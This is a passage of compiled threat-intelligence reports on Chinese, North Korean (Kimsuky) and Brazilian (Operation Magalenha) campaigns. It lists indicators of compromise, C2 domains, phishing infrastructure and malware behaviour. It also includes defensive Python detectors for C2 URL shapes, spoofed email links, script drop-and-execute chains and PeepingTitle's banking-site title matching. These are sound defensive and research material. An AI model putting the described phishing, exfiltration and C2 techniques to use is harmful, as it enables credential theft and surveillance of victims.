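2023-03-02T10:15:01Z 10.1.2.3 GET https://duckducklive.top:8443/functionalStatus 200
2023-03-02T10:15:06Z 10.1.2.3 POST https://duckducklive.top:8443/rest/2/meetingsmCRW64qPFqLKw7X56lR41fx 200
2023-03-02T10:16:11Z 10.1.2.7 GET https://live100heip.com:8443/owa/Z7bziD-BDtV9U1aLS9AhW4jyN1NEOelTEi 200
2023-03-02T10:16:15Z 10.1.2.7 POST https://www.100helpchat.com:8443/owa/XF0O-PjSCEslnDo51T0K4TOY 200
2023-03-02T10:17:00Z 10.1.2.9 GET https://mail.corp.example:443/owa/auth/logon.aspx 200
2023-03-02T10:17:30Z 10.1.2.9 POST https://zoom.example/rest/2/meetings 200
"""

# Path shapes derived from the URIs in the report. The token after the fixed
# prefix is a long run of URL-safe characters with no further path segment,
# which is what separates these from a real Exchange /owa/ or REST path.
PROFILE_RULES = [
    ("meetings-profile GET", re.compile(r"^/functionalStatus[A-Za-z0-9_-]*$")),
    ("meetings-profile POST", re.compile(r"^/rest/2/meetings[A-Za-z0-9]{16,}$")),
    ("owa-profile", re.compile(r"^/owa/[A-Za-z0-9_-]{20,}$")),
]

# Port shared by all three profiles in the report.
C2_PORT = 8443


def scan_proxy_log(log_text):
    """Return one finding per request whose path matches a profile shape.

    Each finding records the line number, host, port and matched profile,
    plus whether the port equals the shared C2 port, so an analyst can rank
    a path match on 8443 above a path match on an ordinary HTTPS port.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed or truncated line; nothing to parse
        method, url = fields[2], fields[3]
        parsed = urlparse(url)
        port = parsed.port or (443 if parsed.scheme == "https" else 80)
        for label, pattern in PROFILE_RULES:
            if pattern.match(parsed.path):
                findings.append({
                    "line": lineno,
                    "method": method,
                    "host": parsed.hostname,
                    "port": port,
                    "profile": label,
                    "port_match": port == C2_PORT,
                })
                break  # one profile per request is enough
    return findings


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```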

The three domains are each hidden behind Cloudflare, which was quick to remediate after we reported the service abuse. In this case, however, the actors revealed their true hosting locations due to an OPSEC mistake in their initial deployment of the domains’ SSL certificates on their Alibaba Cloud hosting servers at 8.218.31[.]103, 47.242.72[.]118, and 47.242.159[.]242.

Certificate use on Alibaba IPs

While the analysis of the Cobalt Strike profiles provides links to previous BRONZE STARLIGHT activities, an assessment of the specific group attribution based on current intelligence should be treated with caution. It is noteworthy that Chinese cyber espionage threat actors are progressively refining their operational tactics in manners that obfuscate clear attribution through publicly available intelligence sources alone.

To illustrate this concept, consider the scenario where a broader array of domains imitating various brands may be interconnected, such as those publicly documented involving the BRONZE STARLIGHT, TA410, and APT10 threat actors. Examples include microsofts[.]net, microupdate[.]xyz, microsofts[.]info, microsofts[.]org, miscrosofts[.]com, microsofts[.]com, kaspresksy[.]com, tencentchat[.]net, and microsoftlab[.]top.

Conclusion

China-nexus threat actors have consistently shared malware, infrastructure, and operational tactics in the past, and continue to do so. The activities this post discusses illustrate the intricate nature of the Chinese threat landscape.

Better understanding of this landscape is essential for keeping up with its dynamics and improving defense strategies. Achieving this necessitates consistent collaborative and information sharing efforts. SentinelLabs remains dedicated to this mission and continues to closely monitor related threats.

Indicators of Compromise

Files (SHA1)

Indicator Description
09f82b963129bbcc6d784308f0d39d8c6b09b293 agentupdate_plugins.exe
1a11aa4bd3f2317993cfe6d652fbe5ab652db151 LockDown.dll
32b545353f4e968dc140c14bc436ce2a91aacd82 mfeann.exe
4b79016d11910e2a59b18275c786682e423be4b4 Adobe CEF Helper.exe
559b4409ff3611adaae1bf03cbadaa747432521b identity_helper.exe
57bbc5fcfd97d25edb9cce7e3dc9180ee0df7111 agentdata.dat
6e9592920cdce90a7c03155ef8b113911c20bb3a AdventureQuest.exe
76bf5ab6676a1e01727a069cc00f228f0558f842 agentdata.dat
88c353e12bd23437681c79f31310177fd476a846 libcef.dll
957e313abaf540398af47af367a267202a900007 msedge_elf.dll

Second-Stage Data URLs

https[://]agenfile.oss-ap-southeast-1[.]aliyuncs.com/agent_source/temp1/cefhelper.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp2/agent_bak.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp3/adobe_helper.zip agentupdate_plugins.exe
https[://]codewavehub.oss-ap-southeast-1.aliyuncs[.]com/org/com/file/CodeVerse.zip AdventureQuest.exe

C2 Domains

www.100helpchat[.]com Cobalt Strike
live100heip[.]com Cobalt Strike

C2 IP Addresses

8.218.31[.]103 Cobalt Strike
47.242.72[.]118 Cobalt Strike

Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

6 June 2023 at 10:55

Executive Summary

  • SentinelLabs has been tracking a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
  • The campaign has the objective of stealing Google and subscription credentials of a reputable news and analysis service focusing on North Korea, as well as delivering reconnaissance malware.
  • Kimsuky engages in extensive email correspondence and uses spoofed URLs, websites imitating legitimate web platforms, and Office documents weaponized with the ReconShark malware.
  • This activity indicates Kimsuky’s growing dedication to social engineering and highlights the group’s increasing interest in gathering strategic intelligence.

Overview

In collaboration with NK News, a leading subscription-based service that provides news and analyses about North Korea, SentinelLabs has been tracking a targeted social engineering campaign against experts in North Korean affairs from the non-government sector. The campaign focuses on theft of email credentials, delivery of reconnaissance malware, and theft of NK News subscription credentials. Based on the used malware, infrastructure, and tactics, we assess with high confidence that the campaign has been orchestrated by the Kimsuky threat actor.

The social engineering tactics and some infrastructure characteristics closely relate to a Kimsuky activity privately reported by PwC and discussed in an NSA advisory published during the writing of this article. We focus on the specific targeting of expert analysts of North Korean affairs by impersonating NK News and stealing NK News credentials, and provide details on used TTPs to support collaborative hunting and detection efforts.

Kimsuky, a suspected North Korean advanced persistent threat (APT) group whose activities align with the interests of the North Korean government, is known for its global targeting of organizations and individuals. Operating since at least 2012, the group often employs targeted phishing and social engineering tactics to gather intelligence and access sensitive information.

A hallmark of the activity we discuss in this post is Kimsuky’s focus on establishing initial contact and developing a rapport with their targets prior to initiating malicious activities. As part of their initial contact strategy, the group impersonated Chad O’Carroll, the founder of NK News and the associated holding company Korea Risk Group, using an attacker-created domain, nknews[.]pro, which closely resembles the legitimate NK News domain nknews.org. The initial email requests the review of a draft article analyzing the nuclear threat posed by North Korea.

If the target engages in the conversation, Kimsuky uses the opportunity to deliver a spoofed URL to a Google document, which redirects to a malicious website specifically crafted to capture Google credentials. Kimsuky may also deliver a weaponized Office document that executes the ReconShark reconnaissance malware.

Further, Kimsukyโ€™s objective extends to the theft of subscription credentials from NK News. To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials.

This Kimsuky activity indicates the group’s growing efforts to establish early communication and foster trust with their targets prior to initiating malicious operations, including the delivery of malware. Their approach highlights the group’s commitment to creating a sense of rapport with the individuals they target, potentially increasing the success rate of their subsequent malicious activities.

By actively targeting high-profile experts in North Korean affairs and stealing subscription credentials from prominent news and analysis outlets focusing on North Korea, Kimsuky demonstrates a heightened interest in understanding how the international community perceives developments concerning North Korea, such as the country’s military activities. These actions are probably part of their broader objective to gather strategic intelligence, contributing to North Korea’s decision-making processes.

Google Credential Theft

We observed Kimsuky distributing an HTML-formatted phishing email to selected individuals, which requests the review of a draft article analyzing the nuclear threat posed by North Korea. The email primarily aims to initiate a subsequent conversation and is intentionally designed to appear benign: it impersonates NK News leadership and lacks any malicious artifacts.

Initial email

If the target engages in the conversation, Kimsuky eventually follows up with an email that contains a URL to a Google document.

Follow-up email

If the target is not responsive, Kimsuky follows up with a reminder email in an attempt to engage the target in conversation.

Reminder email

The URL’s destination is manipulated through the spoofing technique of setting the href HTML attribute to point to a website created by Kimsuky. This method, commonly employed in phishing attacks, creates a discrepancy between the link as displayed (a genuine Google document) and the actual website visited upon clicking the URL.

The displayed URL to a Google document points to an actual article hosted on Google Docs, delving into the topic of the North Korean nuclear threat. The article contains visible edits to give the impression of a genuine draft article, aligning with Kimsuky’s luring tactic.

Google document

The spoofed destination of the URL redirects the target to an attacker-created website that masquerades as a legitimate Google Docs site for requesting document access, such as

https[://]drive-google[.]shanumedia[.]com/pdf/ul/ji78fghJHKtgfLKJIO/s2.php?menu=ZGFu[...]vbQ==

The Base-64 encoded segment, that is, the value of the menu URL query parameter, resolves to the target’s email address.

This serves as a means of transporting the target’s address to the fake Google Docs site, which enables the site to dynamically display the address, creating a personalized and convincing appearance of legitimacy. The design and functionality of this site suggest its potential for reuse in targeting different individuals.
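Both tricks described above, the href that differs from the URL shown to the reader and the Base-64 menu parameter carrying the recipient's address, can be surfaced by a mail-gateway check. The following Python is an added example, not code from the report: it parses an HTML email body, flags anchors whose visible text is a URL on a different host than the href, and decodes any Base-64 query values on the flagged link. The email body, the Google Docs URL, the path token and the encoded address are constructed for this example; only the destination host is the one named in the report.

```python
import base64
import binascii
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample email body (not from the report). The visible link text
# is a Google Docs URL, while the href points to the host named in the report
# with a made-up path token and a Base-64 'menu' value built for this example.
# The second anchor is a legitimate link whose text and href agree.
SAMPLE_EMAIL_HTML = """
<p>Please review the draft here:</p>
<a href="https://drive-google.shanumedia.com/pdf/ul/ji78fghJHKtgfLKJIO/s2.php?menu=YW5hbHlzdEBleGFtcGxlLm9yZw==">
https://docs.google.com/document/d/1aBcDeFgHiJkLmNoPqRsTuVwXyZ/edit
</a>
<p>Regards</p>
<a href="https://nknews.org/">https://nknews.org/</a>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible_text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:  # only text inside an open <a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def find_spoofed_links(html):
    """Return anchors whose visible text is a URL on a different host than the href.

    Only anchors whose displayed text is itself a URL are compared, since that
    is the case where a reader is shown one destination and sent to another.
    """
    parser = _AnchorCollector()
    parser.feed(html)
    hits = []
    for href, text in parser.anchors:
        if not href or not text.lower().startswith(("http://", "https://")):
            continue
        if _host(text) != _host(href):
            hits.append({"shown": text, "actual": href})
    return hits


def decode_b64_params(url):
    """Decode every query value that is valid Base-64 UTF-8 text (e.g. the menu value).

    Values that are not well-formed Base-64, or do not decode to text, are skipped.
    """
    decoded = {}
    for name, values in parse_qs(urlparse(url).query).items():
        for value in values:
            try:
                decoded[name] = base64.b64decode(value, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                pass
    return decoded


if __name__ == "__main__":
    for hit in find_spoofed_links(SAMPLE_EMAIL_HTML):
        print("shown:", hit["shown"])
        print("actual:", hit["actual"])
        print("decoded params:", decode_b64_params(hit["actual"]))
```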

Malicious Google Docs site

We were unable to analyze the functionality behind the Request access web element as the group has taken down the site. However, given the theme of the site, we suspect that it has been designed to capture entered Google credentials.

During conversations with targeted individuals, Kimsuky also seizes any available opportunity to distribute password-protected weaponized Office documents that deploy the ReconShark reconnaissance malware. ReconShark exfiltrates information relevant for conducting subsequent precision attacks, such as deployed detection mechanisms and hardware information. The implementation of the ReconShark variant we observed in this activity remains the same as the one covered in our previous post on Kimsuky activity, with the main distinction being the use of a different C2 server: staradvertiser[.]store. This domain resolves to the IP address 162.0.209[.]27, which has hosted domains that have been attributed to Kimsuky in previous research, such as sesorin[.]lol and rfa[.]ink. Kimsuky’s use of ReconShark as part of this activity underscores the malware’s central role within the group’s current operational playbook.

NK News Credential Theft

We also observed Kimsuky attempting to steal credentials for the subscription service of NK News, which is known for its comprehensive expert analyses and news reports. Gaining access to such reports would provide Kimsuky with valuable insights into how the international community assesses and interprets developments related to North Korea, contributing to their broader strategic intelligence-gathering initiatives.

To accomplish this, Kimsuky distributes an email that lures targeted individuals into logging in to a spoofed NK News subscription service. The emails prompt the recipients to confirm their NK News accounts under the pretext of recent security updates.

Kimsuky phishing email

The fake login site, hosted at https[://]www.nknews[.]pro/ip/register/, features a login form with the standard web elements, such as Sign In, Sign Up, and Forgot Password? buttons. When clicked, the Sign In button executes the loginAct JavaScript function, whereas the rest of the buttons do not conduct any activities.

Fake NK News login site

The JavaScript code captures entered credentials by issuing an HTTP POST request to https[://]www.nknews[.]pro/ip/register/login[.]php and then redirects the user to the legitimate NK News site.

Credential-capturing JavaScript code

The main website hosted at https[://]www.nknews[.]pro redirects to the legitimate NK News site, https://nknews.org, and uses a certificate issued by Sectigo:

  • Thumbprint: a1597d197e9b084a043ada5c7dac1f9b6d7f7af3
  • Serial number: 00f342582c9a299acf2452aaf5115c5be0

The domain nknews[.]pro, registered through Namecheap, also resolves to the Kimsuky-linked IP address 162.0.209[.]27. The URL https[://]www.nknews[.]pro/config[.]php hosts a password-protected remote management site, which is likely an implementation of the b374k tool, based on the implementation of the login site and the presence of the config.php file. The Kimsuky group is known to use this tool for remote management of its infrastructure.

b374k login site

Conclusion

SentinelLabs remains actively engaged in monitoring the activities conducted by Kimsuky. The findings presented in this post highlight the groupโ€™s persistent commitment to targeted social engineering attacks and underscore the need for increased awareness and understanding of Kimsukyโ€™s tactics among potential targets. Maintaining vigilance and implementing effective security measures are imperative to mitigate the risks posed by this persistent threat actor.

Indicators of Compromise

Indicator Description
nknews[.]pro Phishing email sender domain
chad.ocarroll@nknews[.]pro Phishing email sender address
membership@nknews[.]pro Phishing email sender address
https[://]www.nknews[.]pro Website impersonating NK News
https[://]www.nknews[.]pro/config[.]php Website impersonating NK News: b374k login site
https[://]www.nknews[.]pro/ip/register/ Website impersonating NK News: Fake NK News login site
https[://]www.nknews[.]pro/ip/register/login[.]php Website impersonating NK News: NK News credential theft endpoint
https[://]staradvertiser.store/piece/ca[.]php ReconShark payload hosting endpoint
https[://]staradvertiser.store/piece/r[.]php ReconShark C2 server endpoint
162.0.209[.]27 Website impersonating NK News, ReconShark C2 server: IP address
4150B40C00D8AB2E960AA059159149AF3F9ADA09 Malicious document (password-protected): SHA1 hash
7514FD9E5667FC5085373704FE2EA959258C7595 Malicious document: SHA1 hash
41E39162AE3A6370B1100BE2B35BB09E2CBE9782 ReconShark: SHA1 hash

Operation Magalenha | Long-Running Campaign Pursues Portuguese Credentials and PII

25 May 2023 at 10:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • Over the first quarter of 2023, SentinelLabs observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group.
  • The campaign is the latest iteration of a broader activity nexus dating back to 2021, now targeting the users of over 30 financial institutions.
  • The attackers can steal credentials and exfiltrate usersโ€™ data and personal information, which can be leveraged for malicious activities beyond financial gain.
  • The threat group simultaneously deploys two backdoor variants to maximize attack potency.
  • To ensure uninterrupted operations, the threat actor has shifted its infrastructure hosting from IaaS providers implementing stricter anti-abuse measures, such as a major US-based cloud provider, to Timeweb, a Russian IaaS provider known for its more relaxed policies.

Overview

SentinelLabs has been tracking a campaign over the first quarter of 2023 targeting users of Portuguese financial institutions, including government, government-backed, and private institutions. Based on similarities in TTPs as well as overlaps in malware implementation and functionalities reported in previous work, we assess with high confidence that the campaign has been conducted by a Brazilian threat group. This conclusion is further supported by the presence of Brazilian-Portuguese language usage within the infrastructure configurations and malware implementations. We refer to the campaign conducted by this threat group as Operation Magalenha.

The threat actor deploys two backdoor variants on each infected machine, which we collectively dubbed PeepingTitle. Based on overlaps in code and functionalities, we assess that the PeepingTitle backdoors are part of the broader Brazilian financial malware ecosystem โ€“ specifically, of the Maxtrilha family (named by the then-used encryption key) first observed in 2021. We therefore assess that Operation Magalenha is the latest iteration of a long-standing activity nexus.

Operation Magalenha is characterized by changes in infrastructure design, and malware implementation and deployment. The threat actor behind the operation deploys two PeepingTitle variants simultaneously on infected machines, aiming to maximize the potency of their attacks. Further, to ensure uninterrupted operations, the threat actor has strategically transitioned its infrastructure hosting to Timeweb Cloud, a Russian IaaS provider known for its lenient anti-abuse policies, diverging from primarily relying on providers implementing stricter measures, such as DigitalOcean and Dropbox.

The PeepingTitle backdoors are implemented in the Delphi programming language and feature spyware capabilities giving the attackers full control over infected machines, allowing activities such as monitoring window interaction, taking unauthorized screenshots, terminating processes and deploying further malware.

Many of the TTPs we observed relate to those discussed in previous research attributing them to Brazilian threat actors that target users not only in Portugal but also in Spain as well as Central and Latin American countries. These TTPs include the use of Delphi-implemented backdoors, URL shorteners and public file hosting services for hosting malware, and archive files and VB scripts as part of the infection vectors.

Leveraging its malware arsenal, the threat group behind Operation Magalenha can steal credentials, exfiltrate usersโ€™ data and personal information, and achieve full control over infected machines. This opens up further possibilities for the targeting of individuals or organizations, or for the exploitation of that information and data by other cybercriminal or espionage groups.

Infection Vector

Brazilian threat actors are known to distribute malware using a variety of methods, such as phishing emails, social engineering, and malicious websites delivering fake installers of popular applications.

In the context of Operation Magalenha, the infection starts with the execution of a malicious VB script, which primarily serves to download and execute a malware loader and distract users while doing so. The malware loader subsequently downloads and executes the PeepingTitle backdoors.

The VB scripts are obfuscated such that the malicious code is scattered among large quantities of code comments, typically content pasted from publicly available code repositories. This is a simple yet effective technique for evading static detection mechanisms: the scripts that are available on VirusTotal feature relatively low detection ratios.

Code comments for VB script obfuscation

When executed, the VB scripts first open a TinyURL to user login sites of Energias de Portugal (EDP) and the Portuguese Tax and Customs Authority (AT โ€“ Autoridade Tributรกria e Aduaneira). Based on this script behavior, we suspect that the threat group behind Operation Magalenha has been delivering the scripts through EDP- and AT-themed phishing emails, aligning with a known tactic observed among threat actors targeting Portuguese citizens.

The VB scripts serve a twofold purpose for the threat actors:

  • Act as a smoke screen distracting users while the scripts continue to download and execute the malware loader.
  • Enable the theft of EDP and AT credentials if the users enter the credentials after the malware loader has executed the PeepingTitle backdoors. This may provide the threat actor with usersโ€™ personal information. We note that users may log in to the Portuguese Tax and Customs Authority in several ways, including using government-issued credentials for citizens to access not only the online services of the Authority, but also other services provided by the Portuguese state.

A user login site of Energias de Portugal

A user login site of the Portuguese Tax and Customs Authority

The scripts then download to the %PUBLIC% folder an archive file that contains a malware loader. They subsequently extract the loader and delete the archive. Finally, the scripts execute the malware loader after a time interval of, for example, 5 seconds. The malware loader downloads and executes two PeepingTitle backdoor variants.
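
One way to turn the drop-and-execute sequence above into a detection, as an added example that is not part of the post: the Python below correlates constructed Sysmon-style events so that a script host writing into %PUBLIC% and then spawning a process from there within a short window is flagged. The event field names, file names, PIDs and the 60-second window are assumptions.

```python
from datetime import datetime, timedelta

PUBLIC_DIR = "c:\\users\\public\\"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed Sysmon-style events (not from the post): a script host drops an archive
# into %PUBLIC%, writes the extracted loader, deletes the archive and starts the loader
# five seconds later, followed by unrelated benign activity.
EVENTS = [
    {"time": "2023-04-03T09:15:00", "type": "ProcessCreate", "pid": 4120,
     "image": "C:\\Windows\\System32\\wscript.exe", "parent_pid": 900,
     "parent_image": "C:\\Windows\\explorer.exe"},
    {"time": "2023-04-03T09:15:02", "type": "FileCreate", "pid": 4120,
     "path": "C:\\Users\\Public\\pack.zip"},
    {"time": "2023-04-03T09:15:03", "type": "FileCreate", "pid": 4120,
     "path": "C:\\Users\\Public\\loader.exe"},
    {"time": "2023-04-03T09:15:03", "type": "FileDelete", "pid": 4120,
     "path": "C:\\Users\\Public\\pack.zip"},
    {"time": "2023-04-03T09:15:08", "type": "ProcessCreate", "pid": 4388,
     "image": "C:\\Users\\Public\\loader.exe", "parent_pid": 4120,
     "parent_image": "C:\\Windows\\System32\\wscript.exe"},
    {"time": "2023-04-03T09:20:00", "type": "ProcessCreate", "pid": 5000,
     "image": "C:\\Program Files\\App\\app.exe", "parent_pid": 900,
     "parent_image": "C:\\Windows\\explorer.exe"},
]


def in_public(path):
    """True when the path lies under the %PUBLIC% directory (case-insensitive)."""
    return path.lower().startswith(PUBLIC_DIR)


def basename(path):
    """Lower-case file name component of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def detect_public_drop_and_exec(events, window=timedelta(seconds=60)):
    """Alert when a process starts from %PUBLIC% and its parent is a script host that
    wrote files into %PUBLIC% within the preceding window; deleted files are recorded too."""
    written = {}   # pid -> [(time, path)] files the process created under %PUBLIC%
    deleted = {}   # pid -> [path] files the process deleted under %PUBLIC%
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["type"] == "FileCreate" and in_public(ev["path"]):
            written.setdefault(ev["pid"], []).append((t, ev["path"]))
        elif ev["type"] == "FileDelete" and in_public(ev["path"]):
            deleted.setdefault(ev["pid"], []).append(ev["path"])
        elif ev["type"] == "ProcessCreate" and in_public(ev["image"]):
            parent_pid = ev.get("parent_pid")
            if basename(ev.get("parent_image", "")) not in SCRIPT_HOSTS:
                continue  # a process from %PUBLIC% is suspicious, but the rule keys on the script-host parent
            recent = [p for (wt, p) in written.get(parent_pid, [])
                      if timedelta(0) <= t - wt <= window]
            if recent:
                alerts.append({
                    "time": ev["time"],
                    "image": ev["image"],
                    "parent_image": ev["parent_image"],
                    "dropped": recent,
                    "deleted_after_drop": deleted.get(parent_pid, []),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_public_drop_and_exec(EVENTS):
        print(f"{alert['time']} {alert['parent_image']} -> {alert['image']}; dropped {alert['dropped']}")
```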

PeepingTitle

The PeepingTitle sample pairs we analyzed are Delphi executables and have compilation timestamps in April 2023. The samples share some code segments, indicating that they have been developed as part of a single development effort. For example, both malware strains implement similar initialization routines, which involve evaluating the presence of the wine_get_version function in the ntdll.dll library file and establishing persistence by editing the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key.

Similar to other malware used by Brazilian threat actors, the PeepingTitle backdoors contain string artifacts in Brazilian-Portuguese language.

Strings in a PeepingTitle backdoor (in Brazilian-Portuguese)

After initialization, the first PeepingTitle variant monitors at one-second intervals the titles of application windows that have captured the mouse cursor. The malware first transforms a window title into a lowercase string stripped of any whitespace characters. It then checks whether the transformed title contains any of the strings from a predefined set related to targeted institutions. The figure below depicts PeepingTitle monitoring window titles, when a user interacts with a new Google Chrome tab and the Task Manager application, and comparing them against the predefined strings.

PeepingTitle window title monitoring

The predefined strings are defined such that they are part of the browser window titles when a user visits the online resources (i.e., sites or specific online services) of predominantly Portuguese financial institutions or institutions with a presence in Portugal. These include government, government-backed, and private institutions.

The targeted sites and online services encompass a broad set of activities that users may conduct when interacting with them, such as account registration, document overview, and credential input, providing a wealth of personal user information to the threat actor.

The table below lists some of the targeted institutions and services.

PeepingTitle string Targeted institution or service
activobank ActivoBank
aixadirecta Caixadirecta (an online service of Caixa Geral de Depรณsitos, an institution owned by the Portuguese government)
articulares Online banking sites for private users of various institutions
bancanet Citibanamex (online banking site)
bancobest Banco Best
bancoctt Banco CTT
bancomer BBVA
bankia Bankia (currently merged with CaixaBank)
bankinter Bankinter
bpi Banco BPI
caempresas Crรฉdito Agrรญcola (services for corporate users)
caixaagricola Various Mutual Agricultural Credit Banks
caixabank CaixaBank
caixadirectaonline Caixadirecta (a service of Caixa Geral de Depรณsitos)
canaisdigitais Novobanco (online services)
caonline Crรฉdito Agrรญcola (online services)
citibanamex Citibanamex
digitalbanking Online banking services of various institutions
empresas Online banking services for corporate users of various institutions
eurobic EuroBic
homebank Online banking pages of various institutions, such as Banco CTT and Cetelem
ingaccesoclientes ING (login page for online banking)
internetbanking Online banking sites of various institutions, such as the Portuguese Treasury and Public Debt Management Agency
itoagricola Crรฉdito Agrรญcola
loginmillenniumbcp Millennium BCP (Portuguese Commercial Bank)
logintoonlinebanking Online banking services of various institutions
montepio Banco Montepio
netbancoempresas Santander (online banking for corporate users)
netbancoparticulares Santander (online banking for private users)
novobanco Novobanco
openbank Openbank
santander Santander
Example targeted site: The โ€œdigital channelsโ€ subscription form of Novobanco
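
The title-matching logic described above, reproduced in Python as an added example (not the malware's code) for analysts who want to confirm in a sandbox which pages switch the backdoor into its 5-second exfiltration mode; the window titles are constructed, and only a subset of the table's strings is used.

```python
import re

# Window-title substrings from the post's table (lower-case, no whitespace); a subset
# is enough to show how the matching behaves, including the collision-prone short ones.
PEEPINGTITLE_STRINGS = (
    "activobank", "aixadirecta", "articulares", "bancobest", "bancoctt", "bpi",
    "caixabank", "caixadirectaonline", "canaisdigitais", "empresas", "homebank",
    "internetbanking", "loginmillenniumbcp", "montepio", "netbancoparticulares",
    "novobanco", "openbank", "santander",
)


def normalize_title(title):
    """Apply the malware's normalization: lower-case and strip every whitespace character."""
    return re.sub(r"\s+", "", title).lower()


def matching_strings(title, needles=PEEPINGTITLE_STRINGS):
    """Return the predefined substrings that the normalized title contains, in table order."""
    normalized = normalize_title(title)
    return [needle for needle in needles if needle in normalized]


def triage_titles(titles):
    """Map each title to its matches; an empty list means the 1-second idle loop continues."""
    return {title: matching_strings(title) for title in titles}


# Constructed window titles (not from the post): three that would trigger the backdoor,
# one that is unrelated, and one office document whose name collides with a short needle.
WINDOW_TITLES = [
    "Caixa directa Online - Google Chrome",
    "Novo Banco - Canais Digitais - Google Chrome",
    "Área de Particulares - Santander - Mozilla Firefox",
    "Task Manager",
    "Relatório BPI 2023.xlsx - Excel",
]

if __name__ == "__main__":
    for title, hits in triage_titles(WINDOW_TITLES).items():
        print(f"{title!r:60} -> {hits or 'no match'}")
```

Note that whitespace removal is what lets "Caixa directa" match "aixadirecta", and that short needles such as "bpi" fire on any document whose name contains them, so the backdoor's trigger set is broader than the institutions it targets.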

When a user visits a targeted online resource, PeepingTitle sets the window title monitoring interval to 5 seconds, connects to a C2 server, and exfiltrates data in an encrypted form. The data includes a timestamp, the name of the infected machine, and the captured window title, also in an encrypted form. This registers the infected machine at the C2 server.

Exfiltrated data (plaintext form)

PeepingTitle implements backdoor capabilities that allow for full control over the compromised machines, some of which are:

  • Process termination and screenshot capture: PeepingTitle can take screenshots of the entire screen.
  • Staging of further malware: This involves executing malware placed in the %PUBLIC% directory, or first downloading malware executables from attacker-controlled locations to this directory, and subsequent execution. The staged malware could implement any capabilities the threat actor may need in a given situation, such as further data exfiltration, or interaction and overlay screen capabilities to bypass multi-factor authentication. PeepingTitle supports the execution of Windows PE images and DLL files using the rundll32 Windows utility.
  • Reconfiguration: This includes restarting the PeepingTitle process, reconfiguring the window title monitoring interval to 1 second, and configuring the image scale of the screenshots that PeepingTitle takes.

PeepingTitle downloads and/or executes further malware

In contrast to the first variant, the second PeepingTitle variant registers the infected machine at the C2 server upon execution: The malware exfiltrates data in an encrypted form, which includes the name of the infected machine and volume serial numbers. The malware then continues to monitor for changes of the top-level window and takes a screenshot of this window whenever the user changes it.

PeepingTitle sends the screenshot to a different C2 server than the one used for registering the infected machine. The figure below depicts PeepingTitle monitoring for changes of the top-level window, when the top-level window is first the Task Manager application and then, twice in a row, a new Google Chrome tab: the backdoor takes a screenshot of the Google Chrome window only once.

PeepingTitle monitoring for top-level window changes

With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity. The second PeepingTitle variant implements further features, such as downloading and executing malware in the form of Windows PE images, process termination, and malware reconfiguration.

Infrastructure Analysis

Analysis of all infrastructure associated with the threat group behind Operation Magalenha revealed noteworthy changes in design for the operation. First, it is useful to understand the threat actorsโ€™ infrastructure design prior to the latest 2023 activity.

In early to mid 2022, associated activity centered primarily on abusing DigitalOcean Spaces, the S3-compatible cloud storage service, to host the malware used at the time, with buckets acting as download locations for delivering malware to targets. Specifically, the bucket names and example URLs originally used include:

Bucket Name Example URL
Audaction https[://]audaction.fra1.digitaloceanspaces[.]com/pass/alma32.cdr
Azuredatabrickstrainne https[://]azuredatabrickstrainne.sfo3.digitaloceanspaces[.]com/Workspace.zip
Believeonline https[://]believeonline.ams3.digitaloceanspaces[.]com/acoustic/p0.cdr
Cleannertools https[://]cleannertools.fra1.cdn.digitaloceanspaces[.]com/word.ppt
Dssmithcheck https[://]dssmithcheck.fra1.digitaloceanspaces[.]com/track01.sql
Fintecgroup https[://]fintecgroup.ams3.digitaloceanspaces[.]com/louse.msf
Ingretationcompatible http[://]ingretationcompatible.sgp1.digitaloceanspaces[.]com/board.zip
Jackfrostgo http[://]jackfrostgo.fra1.digitaloceanspaces[.]com/thems%20(4).cdr
Marthmusicclub https[://]marthmusicclub.sfo3.digitaloceanspaces[.]com/betunios.cdr
Munich https[://]munich.ams3.digitaloceanspaces[.]com/Minimize.jpeg
Partyprogames https[://]partyprogames.ams3.digitaloceanspaces[.]com/bets.cdr
Pexelsfiles http[://]pexelsfiles.ams3.digitaloceanspaces[.]com/pexels.ppt
Pratoonecooltool https[://]pratoonecooltool.sfo3.digitaloceanspaces[.]com/national.ppt
Ryzemamd https[://]ryzemamd.ams3.digitaloceanspaces[.]com/amd.cdr
Ryzenbootsector http[://]ryzenbootsector.fra1.digitaloceanspaces[.]com/ryzen%20(3).zip
Starbuckplaylist https[://]starbuckplaylist.ams3.digitaloceanspaces[.]com/fiis.cdr
Wekkword https[://]wekkword.ams3.digitaloceanspaces[.]com/alphabet32.cdr
Wordcupnewsrocket https[://]wordcupnewsrocket.ams3.digitaloceanspaces[.]com/INT64.cdr
Wordmusic https[://]wordmusic.ams3.digitaloceanspaces[.]com/bestmusic.cdr
